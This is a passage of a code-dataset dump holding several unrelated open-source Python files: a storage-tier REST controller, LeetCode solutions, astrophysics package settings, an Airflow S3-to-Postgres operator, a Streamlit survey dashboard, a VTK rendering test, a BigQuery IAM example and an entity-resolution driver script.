exception)\n raise exc.HTTPNotFound()\n\n return self._view_builder.show(req, storage_tier)\n\n @wsgi.action(\"create\")\n @wsgi.serializers(xml=StorageBackendTiersTemplate)\n def create(self, req, body=None):\n context = req.environ['sds.context']\n\n if not self.is_valid_body(body, 'storage_tier'):\n raise webob.exc.HTTPBadRequest()\n\n tier_ref = body['storage_tier']\n tier_name = tier_ref.get('tier_name', None)\n backend_name = tier_ref.get('backend_name', None)\n \n if tier_name is None or tier_name == \"\":\n raise webob.exc.HTTPBadRequest()\n\n if backend_name is None or backend_name == \"\":\n raise webob.exc.HTTPBadRequest()\n\n try:\n result = storage_tiers.create_tier(context, tier_name, backend_name, tier_ref.get('capability_specs'))\n _backend_tier_info = storage_tiers.get_tier_by_id(context, result['id'])\n\n notifier_info = dict(tier_info=_backend_tier_info)\n notifier = rpc.get_notifier('storageBackendTiers')\n notifier.info(context, 'storage_backend_tiers.create',\n notifier_info)\n\n except exception.StorageTierExists as err:\n notifier_err = dict(tier_info=tier_ref, error_message=err)\n self._notify_storage_tier_error(context,\n 'storage_tier.create',\n notifier_err)\n\n raise webob.exc.HTTPConflict(explanation=six.text_type(err))\n except Exception as err:\n LOG.warn(\"Exception: %s\" % err)\n notifier_err = dict(tier_info=tier_ref, error_message=err)\n self._notify_storage_tier_error(context,\n 'storage_tier.create',\n notifier_err)\n raise webob.exc.HTTPNotFound()\n\n return self._view_builder.show(req, _backend_tier_info)\n\n @wsgi.action(\"delete\")\n def delete(self, req, id):\n \"\"\"Deletes an existing extra spec.\"\"\"\n context = req.environ['sds.context']\n\n try:\n storage_tiers.destroy_tier_by_id(context, id)\n except Exception as error:\n LOG.warn(\"Exception: %s\" % error)\n raise webob.exc.HTTPNotFound(explanation=error.message)\n\n notifier_info = dict(id=id)\n notifier = rpc.get_notifier('storageBackendTiers')\n notifier.info(context,\n 'storage_backend_tiers.delete',\n notifier_info)\n return webob.Response(status_int=202)\n\n\ndef create_resource():\n return wsgi.Resource(StorageBackendTiersController())\n","repo_name":"opensds/proposals","sub_path":"intel-sds-proto/sds/sds/api/v1/tiers.py","file_name":"tiers.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"23776562211","text":"'''\n1584. Min Cost to Connect All Points\nMedium\n\n4205\n\n98\n\nAdd to List\n\nShare\nYou are given an array points representing integer coordinates of some points on a 2D-plane, where points[i] = [xi, yi].\n\nThe cost of connecting two points [xi, yi] and [xj, yj] is the manhattan distance between them: |xi - xj| + |yi - yj|, where |val| denotes the absolute value of val.\n\nReturn the minimum cost to make all points connected. All points are connected if there is exactly one simple path between any two points.\n\n \n\nExample 1:\n\n\nInput: points = [[0,0],[2,2],[3,10],[5,2],[7,0]]\nOutput: 20\nExplanation: \n\nWe can connect the points as shown above to get the minimum cost of 20.\nNotice that there is a unique path between every pair of points.\nExample 2:\n\nInput: points = [[3,12],[-2,5],[-4,1]]\nOutput: 18\n \n\nConstraints:\n\n1 <= points.length <= 1000\n-106 <= xi, yi <= 106\nAll pairs (xi, yi) are distinct.\n'''\nclass Solution:\n def minCostConnectPoints(self, points: List[List[int]]) -> int:\n \n class UF:\n def __init__(self, n):\n self.root = [i for i in range(n)]\n self.rank = [1]*n\n \n def find(self, x):\n if self.root[x] != x:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n \n def union(self, x, y):\n px, py = self.find(x), self.find(y)\n if px == py:\n return False\n if self.rank[px] > self.rank[py]:\n self.root[py] = self.root[px]\n else:\n self.root[px] = self.root[py]\n if self.rank[px] == self.rank[py]:\n self.rank[py] += 1\n return True\n \n dist_list = []\n for i in range(len(points)):\n x1, y1 = points[i]\n for j in range(i+1,len(points)):\n x2, y2 = points[j]\n dist_list.append((abs(x2-x1)+abs(y2-y1), i, j))\n\n dist_list.sort()\n uf = UF(len(points))\n ans = 0\n for dist, i, j in dist_list:\n if uf.union(i, j):\n ans += dist\n return ans","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2023/09. September/15.minCostConnectPoints.py","file_name":"15.minCostConnectPoints.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4702772797","text":"\nfrom phoebe.parameters import *\nfrom phoebe import conf, __version__\n\n### NOTE: if creating new parameters, add to the _forbidden_labels list in parameters.py\n\ndef settings(**kwargs):\n \"\"\"\n Create a for bundle-level settings.\n\n Generally, this will automatically be added to a newly initialized\n \n\n Arguments\n ----------\n * `dict_filter` (dictionary, optional, default={}): filter to use when using\n dictionary access in the bundle.\n * `dict_set_all` (bool, optional, default=False): whether to set all values\n for dictionary access that returns more than 1 results.\n * `run_checks_compute` (list or string, optional, default='*'): Compute\n options to use when calling run_checks/run_checks_compute or within\n interactive checks.\n * `run_checks_solver` (list or string, optional, default='*'): Solver\n options to use when calling run_checks/run_checks_solver or within\n interactive checks.\n * `run_checks_solution` (list or string, optional, default='*'): Solutions\n to use when calling run_checks/run_checks_solution or within\n interactive checks.\n * `run_checks_figure` (list or string, optional, default='*'): Figures\n to use when calling run_checks/run_checks_figure or within\n interactive checks.\n * `run_checks_server` (list or string, optional, default='*'): Servers\n to use when calling run_checks/run_checks_server or within\n interactive checks.\n * `auto_add_figure` (bool, optional, default=False): Whether to automatically\n add figure parameters when a dataset is added with a new dataset type,\n or a solution is added.\n * `auto_remove_figure` (bool, optional, default=False): Whether to\n automatically remove figure parameters when the referenced\n dataset/solution are removed.\n * `web_client` (bool, optional, default=False): Whether to default to using\n the web-client over a locally installed desktop-client when opening the\n UI from the desktop client.\n * `web_client_url` (string, optional, default='ui.phoebe-project.org'):\n Default location of web-client. Will only be used if web_client is True.\n\n Returns\n --------\n * (): ParameterSet of all newly created\n objects.\n \"\"\"\n\n params = []\n\n params += [StringParameter(qualifier='phoebe_version', value=kwargs.get('phoebe_version', __version__), advanced=True, readonly=True, description='Version of PHOEBE')]\n params += [DictParameter(qualifier='dict_filter', value=kwargs.get('dict_filter', {}), advanced=True, description='Filters to use when using dictionary access')]\n params += [BoolParameter(qualifier='dict_set_all', value=kwargs.get('dict_set_all', False), advanced=True, description='Whether to set all values for dictionary access that returns more than 1 result')]\n\n params += [SelectParameter(qualifier='run_checks_compute', value=kwargs.get('run_checks_compute', '*'), choices=[], advanced=False, description='Compute options to use when calling run_checks/run_checks_compute or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_solver', value=kwargs.get('run_checks_solver', '*'), choices=[], advanced=False, description='Solver options to use when calling run_checks/run_checks_solver or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_solution', value=kwargs.get('run_checks_solution', '*'), choices=[], advanced=False, description='Solutions to use when calling run_checks/run_checks_solution or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_figure', value=kwargs.get('run_checks_figure', '*'), choices=[], advanced=False, description='Figures to use when calling run_checks/run_checks_figure or within interactive checks.')]\n params += [SelectParameter(qualifier='run_checks_server', value=kwargs.get('run_checks_server', '*'), choices=[], advanced=False, description='Servers to use when calling run_checks/run_checks_server or within interactive checks.')]\n\n params += [BoolParameter(qualifier='auto_add_figure', value=kwargs.get('auto_add_figure', True), description='Whether to automatically add figure parameters when a dataset is added with a new dataset type, or a solution is added.')]\n params += [BoolParameter(qualifier='auto_remove_figure', value=kwargs.get('auto_remove_figure', True), description='Whether to automatically remove figure parameters when the referenced dataset/solution are removed.')]\n\n params += [BoolParameter(qualifier='web_client', value=kwargs.get('web_client', False), advanced=True, description='Whether to default to using the web-client over a locally installed desktop-client when opening the UI from the desktop client.')]\n params += [StringParameter(qualifier='web_client_url', value=kwargs.get('web_client_url', 'ui.phoebe-project.org'), advanced=True, description='Default location of web-client. Will only be used if web_client is True.')]\n\n return ParameterSet(params)\n","repo_name":"phoebe-project/phoebe2","sub_path":"phoebe/parameters/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"72"} +{"seq_id":"35610512515","text":"from airflow.models import BaseOperator\r\nfrom airflow.utils.decorators import apply_defaults\r\nfrom airflow.providers.amazon.aws.hooks.s3 import S3Hook\r\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\r\n\r\n\r\nclass S3ToPostgresOperator(BaseOperator):\r\n\r\n template_fields = ['s3_bucket_key', 'postgres_table']\r\n\r\n @apply_defaults\r\n def __init__(\r\n self,\r\n airflow_s3_connection,\r\n s3_bucket_name,\r\n s3_bucket_key,\r\n airflow_postgres_connection,\r\n postgres_table,\r\n postgres_columns_list,\r\n *args, **kwargs\r\n ):\r\n\r\n super().__init__(*args, **kwargs)\r\n self.airflow_s3_connection = airflow_s3_connection \r\n self.s3_bucket_name = s3_bucket_name\r\n self.s3_bucket_key = s3_bucket_key\r\n self.airflow_postgres_connection = airflow_postgres_connection\r\n self.postgres_table = postgres_table\r\n self.postgres_columns_list = postgres_columns_list\r\n\r\n def execute(self, context):\r\n \r\n # Download file from S3\r\n s3_hook = S3Hook(self.airflow_s3_connection)\r\n tmp_filepath = s3_hook.download_file(key = self.s3_bucket_key, bucket_name = self.s3_bucket_name)\r\n self.log.info(f'File {self.s3_bucket_key} downloaded from S3.')\r\n\r\n with open(tmp_filepath, 'r') as tmp_file:\r\n\r\n # Copy data to postgres\r\n postgres_hook = PostgresHook(self.airflow_postgres_connection)\r\n self.log.info(f'Connection to Postgres established.')\r\n\r\n postgres_conn = postgres_hook.get_conn()\r\n postgres_cur = postgres_conn.cursor()\r\n\r\n postgres_columns = ''\r\n if self.postgres_columns_list is not None:\r\n postgres_columns = f'({\", \".join(self.postgres_columns_list)})' \r\n\r\n postgres_cur.copy_expert(f\"\"\"\r\n COPY {self.postgres_table} {postgres_columns} FROM STDIN\r\n \"\"\", tmp_file) \r\n postgres_conn.commit()\r\n self.log.info(f'Data copied to {self.postgres_table} Postgres table.')\r\n ","repo_name":"luizgnf/project-etl-pokemon","sub_path":"dags/custom/operators/custom_s3_to_postgres.py","file_name":"custom_s3_to_postgres.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36676408878","text":"import pandas as pd\r\nimport streamlit as st\r\nimport altair as alt\r\nimport numpy as np\r\n\r\n\r\ndef main():\r\n\r\n df = load_data()\r\n\r\n \r\n\r\n st.title(\"Is ITB Students Ready for Industry Revolution 4.0?\")\r\n st.markdown(\"---\")\r\n st.markdown(\"### Respondent Monitoring Dashboard\")\r\n st.markdown(\"#### By: Christofel Rio Goenawan\")\r\n\t\r\n st.markdown(\"---\")\r\n viz_type_filter = st.selectbox(\"How do you want to see?\", ['Overview','Detailed Information'],0)\r\n\r\n if viz_type_filter == 'Overview':\r\n\r\n # Create overview statistics\r\n average_readiness = str(np.mean(df[\"Readiness\"]))+(\" / 5.0\")\r\n many_not_ready = np.sum(df[\"Not Ready\"])\r\n many_ready = len(df) - many_not_ready\r\n\r\n data = {'Average Readiness':[average_readiness], 'Number of Ready Students':[many_ready], 'Number of Not Ready':[many_not_ready]} \r\n \r\n # Create DataFrame \r\n df_stat = pd.DataFrame(data) \r\n\r\n \r\n\r\n st.table(df_stat.assign(hack='').set_index('hack'))\r\n \r\n\r\n st.markdown(\"> Chart in this page shows the comparison of number of respondents who is feel ready or not\")\r\n st.markdown(\"**Respondents: {}**\".format(len(df)))\r\n \r\n\r\n variable_filter = st.selectbox(\"Variable Filter\", ['No Filter','University',\"Faculty\", \"Batch Year\", \"Know Revolution 4.0 or Not\"],0)\r\n\r\n if variable_filter == 'No Filter':\r\n visualize_is_tested_comparison(df,None)\r\n elif variable_filter == 'University':\r\n visualize_is_tested_comparison(df,\"university\")\r\n elif variable_filter == \"Faculty\":\r\n visualize_is_tested_comparison(df,\"Faculty\")\r\n elif variable_filter == \"Batch Year\":\r\n visualize_is_tested_comparison(df,'Batch Year')\r\n elif variable_filter == \"Know Revolution 4.0 or Not\":\r\n visualize_is_tested_comparison(df,'Know Industry 4.0')\r\n else:\r\n st.write(\"Work in Progress..\")\r\n\r\n\r\n elif viz_type_filter == 'Detailed Information':\r\n st.markdown(\"> Charts in this page are detailed information of Data\")\r\n st.markdown(\"### Skills provided by ITB\")\r\n\r\n skill_list = [\"Skill coding\", \"Big Data Skills\", \"Machine Learning Skills\", \"Creativity\", \"People Management\", \"Critical Thinking\"]\r\n\r\n data = {'Count':[]}\r\n # Create DataFrame \r\n df_skill_provided = pd.DataFrame(data) \r\n\r\n for skill in skill_list:\r\n df_skill_provided.loc[skill] = np.sum(df[\"Because \"+str(skill)])\r\n\r\n df_skill_provided = df_skill_provided.sort_values(by=[\"Count\"] , ascending = False)\r\n\r\n st.bar_chart(df_skill_provided, height=800,width=800)\r\n\r\n st.markdown(\"### Skills should be provided by ITB\")\r\n\r\n df_skill_should_provided = pd.DataFrame(data) \r\n\r\n for skill in skill_list:\r\n df_skill_should_provided.loc[skill] = np.sum(df[\"Should \"+str(skill)])\r\n\r\n df_skill_should_provided = df_skill_should_provided.sort_values(by=[\"Count\"] , ascending = False)\r\n\r\n st.bar_chart(df_skill_should_provided, height=800,width=800)\r\n\r\n\r\ndef load_data():\r\n\tdf = pd.read_csv('survey_data.csv')\r\n\r\n\tdf['filling date'] = pd.to_datetime(df['filling date']).dt.date\r\n\r\n\treturn df\r\n\r\n\r\ndef visualize_is_tested_comparison(df,variable):\r\n\t\r\n\tif variable==None:\r\n\t\tdf_grouped = df.groupby(['Readiness']).size().reset_index(name='count')\r\n\r\n\t\tbars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count')\r\n\t\t\t)\r\n\r\n\t\tgroup_bars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count'),\r\n\t\t\ttooltip = [alt.Tooltip('sum(count):Q',title='count')],\r\n\t\t\tcolor = alt.Color('Readiness')\r\n\t\t\t)\r\n\r\n\t\ttext = bars.mark_text(dy=-10).encode(\r\n\t\t\ttext = 'sum(count):Q'\r\n\t\t\t)\r\n\r\n\t\tgroup_text = alt.Chart(df_grouped).mark_text(dy=12,color='white').encode(\r\n\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\ty = alt.Y('sum(count):Q', stack='zero'),\r\n\t\t\tdetail = 'Readiness:N',\r\n\t\t\ttext = alt.Text('sum(count):Q')\r\n\t\t\t)\r\n\r\n\t\tst.altair_chart((group_bars + text + group_text).properties(height=800,width=800,title='Comparison Between Readiness'))\r\n\r\n\telse:\r\n\r\n\t\tfor _type in df[variable].unique():\r\n\t\t\tdf_temp = df[df[variable]==_type]\r\n\t\t\tdf_grouped = df_temp.groupby(['Readiness']).size().reset_index(name='count')\r\n\r\n\t\t\tbars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count')\r\n\t\t\t\t)\r\n\r\n\t\t\tgroup_bars = alt.Chart(df_grouped).mark_bar().encode(\r\n\t\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\t\ty = alt.Y('sum(count):Q', stack='zero',title='count'),\r\n\t\t\t\ttooltip = [alt.Tooltip('sum(count):Q',title='count')],\r\n\t\t\t\tcolor = alt.Color('Readiness')\r\n\t\t\t\t)\r\n\r\n\t\t\ttext = bars.mark_text(dy=-10).encode(\r\n\t\t\t\ttext = 'sum(count):Q'\r\n\t\t\t\t)\r\n\r\n\t\t\tgroup_text = alt.Chart(df_grouped).mark_text(dy=12,color='white').encode(\r\n\t\t\t\tx = alt.X('Readiness:N'),\r\n\t\t\t\ty = alt.Y('sum(count):Q', stack='zero'),\r\n\t\t\t\tdetail = 'Readiness:N',\r\n\t\t\t\ttext = alt.Text('sum(count):Q')\r\n\t\t\t\t)\r\n\r\n\t\t\tst.altair_chart((group_bars + text + group_text).properties(height=800,width=800,title='Comparison Between Readiness on ' + str(variable)+ \" :\" + str(_type)))\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"christofel04/Real-Time-Customizable-Dashboard-of-G-Form","sub_path":"main_function_streamlit.py","file_name":"main_function_streamlit.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9034114049","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Test the scalar bar actor using a logarithmic lookup table\n#\nVTK_INTEGRATE_BOTH_DIRECTIONS = 2\n#\n# generate tensors\nptLoad = vtk.vtkPointLoad()\nptLoad.SetLoadValue(100.0)\nptLoad.SetSampleDimensions(20,20,20)\nptLoad.ComputeEffectiveStressOn()\nptLoad.SetModelBounds(-10,10,-10,10,-10,10)\n# Generate hyperstreamlines\ns1 = vtk.vtkHyperStreamline()\ns1.SetInputConnection(ptLoad.GetOutputPort())\ns1.SetStartPosition(9,9,-9)\ns1.IntegrateMinorEigenvector()\ns1.SetMaximumPropagationDistance(18.0)\ns1.SetIntegrationStepLength(0.1)\ns1.SetStepLength(0.01)\ns1.SetRadius(0.25)\ns1.SetNumberOfSides(18)\ns1.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns1.Update()\n# Map hyperstreamlines\nlut = vtk.vtkLogLookupTable()\nlut.SetHueRange(.6667,0.0)\nscalarBar = vtk.vtkScalarBarActor()\nscalarBar.SetLookupTable(lut)\nscalarBar.SetTitle(\"Stress\")\nscalarBar.GetPositionCoordinate().SetCoordinateSystemToNormalizedViewport()\nscalarBar.GetPositionCoordinate().SetValue(0.1,0.05)\nscalarBar.SetOrientationToVertical()\nscalarBar.SetWidth(0.1)\nscalarBar.SetHeight(0.9)\nscalarBar.SetPosition(0.01,0.1)\nscalarBar.SetLabelFormat(\"%-#6.3f\")\nscalarBar.GetLabelTextProperty().SetColor(1,0,0)\nscalarBar.GetTitleTextProperty().SetColor(1,0,0)\ns1Mapper = vtk.vtkPolyDataMapper()\ns1Mapper.SetInputConnection(s1.GetOutputPort())\ns1Mapper.SetLookupTable(lut)\nptLoad.Update()\n#force update for scalar range\ns1Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns1Actor = vtk.vtkActor()\ns1Actor.SetMapper(s1Mapper)\ns2 = vtk.vtkHyperStreamline()\ns2.SetInputConnection(ptLoad.GetOutputPort())\ns2.SetStartPosition(-9,-9,-9)\ns2.IntegrateMinorEigenvector()\ns2.SetMaximumPropagationDistance(18.0)\ns2.SetIntegrationStepLength(0.1)\ns2.SetStepLength(0.01)\ns2.SetRadius(0.25)\ns2.SetNumberOfSides(18)\ns2.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns2.Update()\ns2Mapper = vtk.vtkPolyDataMapper()\ns2Mapper.SetInputConnection(s2.GetOutputPort())\ns2Mapper.SetLookupTable(lut)\ns2Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns2Actor = vtk.vtkActor()\ns2Actor.SetMapper(s2Mapper)\ns3 = vtk.vtkHyperStreamline()\ns3.SetInputConnection(ptLoad.GetOutputPort())\ns3.SetStartPosition(9,-9,-9)\ns3.IntegrateMinorEigenvector()\ns3.SetMaximumPropagationDistance(18.0)\ns3.SetIntegrationStepLength(0.1)\ns3.SetStepLength(0.01)\ns3.SetRadius(0.25)\ns3.SetNumberOfSides(18)\ns3.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns3.Update()\ns3Mapper = vtk.vtkPolyDataMapper()\ns3Mapper.SetInputConnection(s3.GetOutputPort())\ns3Mapper.SetLookupTable(lut)\ns3Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns3Actor = vtk.vtkActor()\ns3Actor.SetMapper(s3Mapper)\ns4 = vtk.vtkHyperStreamline()\ns4.SetInputConnection(ptLoad.GetOutputPort())\ns4.SetStartPosition(-9,9,-9)\ns4.IntegrateMinorEigenvector()\ns4.SetMaximumPropagationDistance(18.0)\ns4.SetIntegrationStepLength(0.1)\ns4.SetStepLength(0.01)\ns4.SetRadius(0.25)\ns4.SetNumberOfSides(18)\ns4.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)\ns4.Update()\ns4Mapper = vtk.vtkPolyDataMapper()\ns4Mapper.SetInputConnection(s4.GetOutputPort())\ns4Mapper.SetLookupTable(lut)\ns4Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())\ns4Actor = vtk.vtkActor()\ns4Actor.SetMapper(s4Mapper)\n# plane for context\n#\ng = vtk.vtkImageDataGeometryFilter()\ng.SetInputConnection(ptLoad.GetOutputPort())\ng.SetExtent(0,100,0,100,0,0)\ng.Update()\n#for scalar range\ngm = vtk.vtkPolyDataMapper()\ngm.SetInputConnection(g.GetOutputPort())\ngm.SetScalarRange(g.GetOutput().GetScalarRange())\nga = vtk.vtkActor()\nga.SetMapper(gm)\n# Create outline around data\n#\noutline = vtk.vtkOutlineFilter()\noutline.SetInputConnection(ptLoad.GetOutputPort())\noutlineMapper = vtk.vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\noutlineActor = vtk.vtkActor()\noutlineActor.SetMapper(outlineMapper)\noutlineActor.GetProperty().SetColor(0,0,0)\n# Create cone indicating application of load\n#\nconeSrc = vtk.vtkConeSource()\nconeSrc.SetRadius(.5)\nconeSrc.SetHeight(2)\nconeMap = vtk.vtkPolyDataMapper()\nconeMap.SetInputConnection(coneSrc.GetOutputPort())\nconeActor = vtk.vtkActor()\nconeActor.SetMapper(coneMap)\nconeActor.SetPosition(0,0,11)\nconeActor.RotateY(90)\nconeActor.GetProperty().SetColor(1,0,0)\n# Create the rendering infrastructure\n#\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetMultiSamples(0)\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\ncamera = vtk.vtkCamera()\ncamera.SetFocalPoint(0.113766,-1.13665,-1.01919)\ncamera.SetPosition(-29.4886,-63.1488,26.5807)\ncamera.SetViewAngle(24.4617)\ncamera.SetViewUp(0.17138,0.331163,0.927879)\ncamera.SetClippingRange(1,100)\nren1.AddActor2D(scalarBar)\nren1.AddActor(s1Actor)\nren1.AddActor(s2Actor)\nren1.AddActor(s3Actor)\nren1.AddActor(s4Actor)\nren1.AddActor(outlineActor)\nren1.AddActor(coneActor)\nren1.AddActor(ga)\nren1.SetBackground(1.0,1.0,1.0)\nren1.SetActiveCamera(camera)\nrenWin.SetSize(300,300)\nrenWin.Render()\n# prevent the tk window from showing up then start the event loop\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Filters/Modeling/Testing/Python/HyperScalarBar.py","file_name":"HyperScalarBar.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"16332764708","text":"from google.cloud import bigquery\n\nimport os\n\nif __name__ == '__main__':\n path_to_credential = '/Users/wangez/Downloads/agolis-allen-first-2a651eae4ca4.json'\n os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path_to_credential\n client=bigquery.Client()\n\n table=client.get_table('agolis-allen-first.ELM.all_dt_test')\n role='roles/bigquery.dataViewer'\n\n\n\n p = client.get_iam_policy(table)\n user=\"user:wangez@google.com\"\n p.bindings.append({\"role\":\"roles/bigquery.dataViewer\",\"members\":{user}})\n client.set_iam_policy(table,p)\n\n\n print('x')\n\n\n\n","repo_name":"DigitalWNZ/gcp_python_code","sub_path":"iam_sample.py","file_name":"iam_sample.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775071951","text":"'''\n\n'''\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n carry = 0\n dummy = ListNode()\n curr = dummy\n while l1 and l2:\n s = l1.val + l2.val + carry\n curr.next = ListNode(s%10)\n curr = curr.next\n carry = s // 10\n l1 = l1.next\n l2 = l2.next\n balance = l1 or l2\n while balance:\n s = balance.val + carry\n curr.next = ListNode(s%10)\n curr = curr.next\n carry = s // 10\n balance = balance.next\n if carry:\n curr.next = ListNode(carry)\n return dummy.next\n","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2022/03. March/10.addTwoNumbers.py","file_name":"10.addTwoNumbers.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20507631261","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nimport time\nimport datetime\nimport logging\nimport DWM10_Parms\nimport DWM14_BuildRefDict\nimport DWM15_BuildLinkIndex\nimport DWM16_BuildTokenFreqDict\nimport DWM25_Global_Token_Replace\nimport DWM42_BuildBlockPairs\nimport DWM45_Block_Cleaning\nimport DWM55_LinkBlockPairs\nimport DWM80_TransitiveClosure\nimport DWM90_IterateClusters\nimport DWM96_WriteLinkIndex\nimport DWM97_ClusterProfile\nimport DWM99_ERmetrics\nimport DWM100_ReportData\nimport xlsxwriter\n\n\n# In[2]:\n\n\n# Main Driver for Refactored Data Washing Machine\n# Version 1.20 creates a log file with same information being written to console\n# Version 1.30 creates cluster profile at end of program and evaluates ER statistics\n# Version 1.40 FK - added module DWM25 to do global level token replacement\n# JRT - added DWM65_ScoringMatrix to allow ScoringMatrix as a comparitor type\n# Version 1.50 Revised and corrected scoring matrix\n# Revised DWM25 Global Replacement to reuse Tokenizer Dictionary and use DWM_WordList.txt\n# Version 1.60 Implemented 2 versions of Scoring Rule - Standard (Std) and Weighted (Kris)\n# Changed Parms to be a class imported by all modules\n# Version 1.70 Added new parameter minBlkTokenLen to set a minimum length for blokcing tokens\n# Improved performance of global cleaning\n# Version 1.80 Added new parameter excludeNumericBlocks when True does not block on numeric tokens\n# Added new parameter removeExcludedBlkTokens when True removes tokens excluded by\n# minBlkTokenLen & exludeNumbericBlocks\n# Added timer and added Total Runtime to logging statistics\n# Version 1.90 Extensive refactor of the processing logic separating stop word removal from blocking.\n# Also generate and deduplicate pairs from all blocks before comparing or correcting references\n# Added a new parameter blockByPairs requiring refs in a block to share 2 tokens\n# Version 2.00 Added new parameter runIterationProfile to print profile & stats at end of each iteration\n# Also generated new token statistics for number of all-digit (numeric) tokens and ratio to total\n# Added token length profile and statistics\n# Version 2.10 Added DWM100 for reporting to create a spreadsheet of statistics with parameter settings.\n# Added DWM45 with a new parameter blockCorrection to correct blocking tokens.\n# Added changes to DWM25 and DWM80 for faster processing of data.\n# Version 2.20 Both global and block corrections output to log file instead of separate files\n# 3 new parms, globalCorrectionDetail, blockCorrectionDetail, addRefsToLinkIndex\n# Version 2.21 Corrected two bugs, one in Global Correction, and one in DWM90\ndef DWM_Cluster(fname):\n version = 2.21\n\n # get start time for timer\n startTime = time.time()\n # date time is used to label the logfile\n now = datetime.datetime.now()\n tag = str(now.year)+(str(now.month)).zfill(2)+(str(now.day)).zfill(2)\n tag = tag+'_'+(str(now.hour)).zfill(2)+'_'+(str(now.minute)).zfill(2)\n logFile = open('DWM_Log_'+tag+'.txt','w')\n print(\"Data Washing Machine Refactor Version\",version)\n print(\"Data Washing Machine Refactor Version\",version, file=logFile)\n print(\"Date/Time\",tag)\n print(\"Data/Time\",tag, file=logFile)\n # while True:\n # choice = input('Enter 1 to run single parms file, Enter 2 to run a list of parms files ->')\n # if choice == '1':\n # multi = False\n # parmFileName = input('Enter Name of a Single Parameter File ->')\n # break\n # if choice == '2':\n # multi = True\n # fileName = input('Enter Name of a List of Parameter Files ->')\n # file1 = open(fileName, 'r')\n # break\n # print('Try again')\n #data reporting init\n multi = False\n parmFileName = fname\n excelFileName = 'DWM_Results_'+tag+'.xlsx'\n DWM10_Parms.workbook = xlsxwriter.Workbook(excelFileName)\n DWM10_Parms.worksheet = DWM10_Parms.workbook.add_worksheet()\n DWM10_Parms.startRow = 0\n while True: \n now1 = datetime.datetime.now()\n # if multi == True:\n # parmFileName = file1.readline()\n # print('\\n\\nRunning parms file',parmFileName)\n # print('\\nRunning parms file ',parmFileName, file=logFile)\n # parmFileName = parmFileName.replace('\\n','')\n # if not parmFileName:\n # print('\\nEnd of the parmFileName Runs')\n # break\n \n print('\\n\\nRunning parms file',parmFileName)\n print('\\nRunning parms file ',parmFileName, file=logFile) \n DWM10_Parms.getParms(parmFileName, logFile)\n # Must get mu start and save to muStart for single parms file\n # and epsilonStart for parmeter single parms file\n # DWM10_Parms.blockCorrection changes if DWM45 runs need original value for reporting\n DWM10_Parms.muStart=DWM10_Parms.mu\n DWM10_Parms.epsilonStart=DWM10_Parms.epsilon\n DWM10_Parms.blockCorrect =DWM10_Parms.blockCorrection\n # Create refDict, a dictionary where key=refID, value is list of reference tokens\n refDict = DWM14_BuildRefDict.tokenizeInput()\n # Create linkIndx, a dictionary where key=refID, value is cluster ID`\n linkIndex = DWM15_BuildLinkIndex.buildLinkIndex(refDict)\n # Create tokenFeqDict, a dictionary where key=token, value is token frequency\n 